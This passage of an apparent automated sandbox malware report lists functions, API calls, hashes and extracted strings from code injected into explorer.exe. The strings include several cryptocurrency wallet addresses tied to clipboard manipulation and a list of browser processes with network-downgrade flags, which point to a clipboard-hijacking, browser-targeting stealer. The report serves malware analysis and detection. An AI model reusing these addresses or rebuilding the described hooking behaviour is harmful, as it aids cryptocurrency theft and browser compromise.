                                                                                                                                                                                                                        • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0FF58366
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • String ID: 0x6f5d22258243f738460e0e4fe1f8c0fa58ce9abe$13MUDpYmziJo8zMD2743Ygch5c1ae8QiNV$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LQwgkF3f1AAZZ3WuewhRobt2h15NWfivtx$TBid7Hs8NBHCPytFMgKc3VTvzFgL5KPMbb$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                        • API String ID: 2992153386-3773165574
                                                                                                                                                                                                                        • Opcode ID: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction ID: 9318a5947c9c239db7121f796cdd3a10d269bb3730df767fae6382b6c1d0c938
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a1ac99372e29ab795ba79f5b1fdf45b8ebdb8f0876bd9542872a168e3d096c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFD11762710B46A5DF10EFA1DC942EC3766EB54BDCFC045229F0D9BA5AEF28D209C390

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFAA56F
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: EnterCriticalSection.KERNEL32 ref: 0DFA8FE8
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: RtlInitializeCriticalSection.NTDLL ref: 0DFA8FF5
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcpyA.KERNEL32 ref: 0DFA902A
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcpyA.KERNEL32 ref: 0DFA904D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcatA.KERNEL32 ref: 0DFA905D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrcatA.KERNEL32 ref: 0DFA906D
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: LeaveCriticalSection.KERNEL32 ref: 0DFA90F4
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: memcpy.MSVCRT ref: 0DFA910C
                                                                                                                                                                                                                          • Part of subcall function 0DFA8FA0: lstrlenA.KERNEL32 ref: 0DFA911A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0DFAA596
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DFAA60A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0DFAA615
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction ID: b821c62645d03fd52759485b8e6c90ac6f71ad590b3db74959e5a3d479d89401
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3d1ab3fba337ad5dcc350544333ec5135f84db484372576282df7e02b139df
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A218061609B42C5DB55DF69F84036AB7E6FB88B84F44C036DA8A47B24EF7CC148C754
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        • Opcode ID: 97d23527a7656dab249dd98e1b24256f162940f3da22b3a2b674c21feeeeb64c
                                                                                                                                                                                                                        • Instruction ID: 79ff980327ec098ff69b7e5626e8a1302d3d8fe38ab61a01a09815ce0080b293
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97d23527a7656dab249dd98e1b24256f162940f3da22b3a2b674c21feeeeb64c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6311876618A81DAD750CFA9F84035EB7B5FB89344F90542AEB8D83A28EB7DC544CF10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:\
                                                                                                                                                                                                                        • API String ID: 3001812590-790759568
                                                                                                                                                                                                                        • Opcode ID: 6ffb3a8ee82f8b8c08542798f729a8367e2575e1d6ae2ae2f0e1cd6a687a5205
                                                                                                                                                                                                                        • Instruction ID: b31f7eb997e47f8d26a24996d7843b34d6fb240958598821e445f95d256e2e31
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ffb3a8ee82f8b8c08542798f729a8367e2575e1d6ae2ae2f0e1cd6a687a5205
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93314C322187C4DAD751CFA9E85035BBBA2F799344F54402AEBC983A28DB7CC509CF10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 993137029-0
                                                                                                                                                                                                                        • Opcode ID: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction ID: f11efa531c5c0fa3de59b00a52b104b134c76e144254d5694340872be37f4bf8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 921c1f8297211391b9fd7d2c7e65062696bebe892b3c98ec20eb49e7a9b2a8a1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62016D76A12B4192DB448F6AE89432D7362FB88BD4F08C036DA1B03724CF38D062C740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction ID: df08dc1531fd7c69023c7b8cc76abb1cc3693a132061bc285847839f022eef89
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2E08660A1270292EF1A27B268593BD2222DB5DB52F489439C90B45360EE2CC1D58310
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction ID: 1b83d7ea0255d8b6a0510d2e5cf96058077ae7951d79464b00a8c8d6bc827724
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62E08C70A26740C3EF2A1771E8993AE13A1AB5CB81F5418B8C90A653A0EF3C86D98700
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2372642624-0
                                                                                                                                                                                                                        • Opcode ID: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction ID: 2b75dbc53502fdbc924aa4d4956a87a5eb12904526bf011539a5d1858e8b7a54
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdc58646175888406e1070b5baf2fd2f5f643a71a9ea6f4a592965fe306efb3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AE08660A1670383EF3A2B7174553799220AF5DF51F88143CCE0A89751EF2C95D59300
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2622297391-0
                                                                                                                                                                                                                        • Opcode ID: 6abd5b3272766fed2057ca6335340b6bd206ca77af65de36614cec0bc2ef62cd
                                                                                                                                                                                                                        • Instruction ID: 93a575be7eb92766e86dcb94e5acea66bffe52d14d42278c2dabfb21ffcbca1d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6abd5b3272766fed2057ca6335340b6bd206ca77af65de36614cec0bc2ef62cd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D3138A1B16B4185EF21AF1EE510B6AB6A2F748FC4F18843ADA4D0BB18EF78C5518750
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 882653843-0
                                                                                                                                                                                                                        • Opcode ID: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction ID: daa0f6e7dd027387904f172f3cb6fba617206e3a58be1c3aecf05c3cedc1a0a2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C831DDA360878186D7118F79A50036D7BA1F305FC8F088216EF998B79ADB6CD451C724
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: lstrlenA.KERNEL32 ref: 0DFAA6C2
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: InternetCrackUrlA.WININET ref: 0DFAA6D7
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: PathFindFileNameA.SHLWAPI ref: 0DFAA751
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: GetTempPathA.KERNEL32 ref: 0DFAA76F
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: GetTempFileNameA.KERNEL32 ref: 0DFAA785
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: lstrcatA.KERNEL32 ref: 0DFAA795
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: lstrcatA.KERNEL32 ref: 0DFAA7A1
                                                                                                                                                                                                                          • Part of subcall function 0DFAA620: CreateFileA.KERNEL32 ref: 0DFAA7CA
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: SHGetFolderPathA.SHELL32 ref: 0DFA9EC3
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9ED3
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9EE1
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: CreateDirectoryA.KERNEL32 ref: 0DFA9EEC
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: SetFileAttributesA.KERNEL32 ref: 0DFA9EFA
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9F0A
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9F18
                                                                                                                                                                                                                          • Part of subcall function 0DFA9E70: lstrcatA.KERNEL32 ref: 0DFA9F28
                                                                                                                                                                                                                        • DeleteFileA.KERNEL32 ref: 0DFAA910
                                                                                                                                                                                                                        • CopyFileA.KERNEL32 ref: 0DFAA926
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0DFAA939
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3447680573-0
                                                                                                                                                                                                                        • Opcode ID: 35aa4db215c5fc156b0e988b7bb3c47b17532f7827867ebc2ad3a055e454aab3
                                                                                                                                                                                                                        • Instruction ID: 6a337636f237b3d5761b3a420d5b9436f1afa8e1fbb3970d6973adcd3b900427
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35aa4db215c5fc156b0e988b7bb3c47b17532f7827867ebc2ad3a055e454aab3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E721C37272C98281EB30D72DE8647EA7351FBDC748F8190119A8E46A48EF6CC309CB10
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: GetCurrentProcessId.KERNEL32 ref: 0DFA845B
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: GetCurrentThreadId.KERNEL32 ref: 0DFA8467
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: HeapAlloc.KERNEL32 ref: 0DFA8491
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: Thread32Next.KERNEL32 ref: 0DFA84F0
                                                                                                                                                                                                                          • Part of subcall function 0DFA8400: CloseHandle.KERNEL32 ref: 0DFA8500
                                                                                                                                                                                                                        • OpenThread.KERNEL32 ref: 0DFA863E
                                                                                                                                                                                                                        • SuspendThread.KERNEL32 ref: 0DFA864F
                                                                                                                                                                                                                          • Part of subcall function 0DFA89F0: GetThreadContext.KERNEL32 ref: 0DFA8A24
                                                                                                                                                                                                                          • Part of subcall function 0DFA89F0: SetThreadContext.KERNEL32 ref: 0DFA8AE4
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0DFA8666
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4205413918-0
                                                                                                                                                                                                                        • Opcode ID: f87ba56fbfc39a26588533dbd85fbd0d1f2ef08c9963a931b1320233d17f7ec2
                                                                                                                                                                                                                        • Instruction ID: fb6f22c7edbc2987f47abd05852d0b7c093d01393a6ebc968cf66569ff034d88
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f87ba56fbfc39a26588533dbd85fbd0d1f2ef08c9963a931b1320233d17f7ec2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5015B32615B8196D714DF1AA49062EB771F789FC4F98D135DF8A03B18CF38D9628B04
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA83B0: Sleep.KERNEL32 ref: 0DFA83DC
                                                                                                                                                                                                                        • HeapCreate.KERNEL32 ref: 0DFA891D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateHeapSleep
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 221814145-0
                                                                                                                                                                                                                        • Opcode ID: ce5d471f1fa3be9d25ce499402e3443f5f1b3496d36fc271069fe1ba1ca05d49
                                                                                                                                                                                                                        • Instruction ID: 6faf7d0130e1bfd60e6551c7858ac079b618ee459647ded96b3f46af5365d622
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce5d471f1fa3be9d25ce499402e3443f5f1b3496d36fc271069fe1ba1ca05d49
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1E03991B0634142FB297BFD588233D32849B08390F48D8398F1905391DEA8CCE99672
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                        • API String ID: 3240663557-511764017
                                                                                                                                                                                                                        • Opcode ID: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction ID: cb6b94608c63ae66c917366a09324e1b05d9d2cc6220fd31528a285ad6e8f229
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50C13832705B8596EB20DF72E85439E77A1F789B88F800525DE8A57B68DF7CC649CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                        • API String ID: 3240663557-511764017
                                                                                                                                                                                                                        • Opcode ID: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction ID: 2e71ea06920a4ecdc0095f8d88cbe90df16955651b14fb0d9476c02760cdbc77
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAC1103560874796EB24DF62E8547B9B7A1FB89B98F400135DE4A87B18DF38E149DB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
• Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4277384649-0
                                                                                                                                                                                                                        • Opcode ID: cedae4f0320c4adc7fe89b8ce4c00fa1c50a0c43ad6ec3ef2381a080d655a17c
                                                                                                                                                                                                                        • Instruction ID: 7daed0db37e5beb27e89fb0af995a8506a241871bc53b4dc4d64e898c5b9be01
